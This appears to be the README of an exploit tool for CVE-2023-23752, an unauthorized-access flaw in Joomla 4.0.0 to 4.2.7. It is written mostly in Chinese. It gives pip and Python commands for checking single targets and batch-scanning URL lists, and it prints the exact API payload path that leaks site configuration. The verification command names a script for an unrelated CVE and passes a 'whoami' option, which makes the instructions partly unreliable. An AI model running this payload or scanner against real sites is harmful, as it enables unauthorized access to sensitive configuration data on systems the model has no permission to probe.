CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability
安装python库
pip install -r requirements.txt
漏洞验证
python3 CVE-2022-26134_check.py -u url -c whoami
批量扫描
python3 CVE-2023-23752.py -f url_part.txt
4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
访问漏洞地址,抓包,重放数据包
Joomla! CMS 版本4.0.0- 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露